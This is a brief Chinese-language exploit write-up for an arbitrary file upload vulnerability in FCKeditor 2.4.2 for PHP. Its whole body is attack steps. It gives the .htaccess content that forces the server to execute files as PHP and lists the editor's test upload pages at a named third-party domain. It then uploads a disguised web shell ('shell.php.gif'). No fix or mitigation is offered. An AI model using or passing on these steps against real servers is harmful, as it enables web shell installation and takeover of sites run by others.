Fckeditor =2.4.2 For php 任意上传文件漏洞
1.Fckeditor =2.4.2 For php 任意上传文件漏洞 篇一
发布时间:
源码地址:sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
SetHandler application/x-httpd-php
2.实用编辑器上传htaccess文件.
www.badguest.cn/FCKeditor/editor/filemanager/upload/test.html
www.badguest.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
【Fckeditor =2.4.2 For php 任意上传文件漏洞】推荐阅读: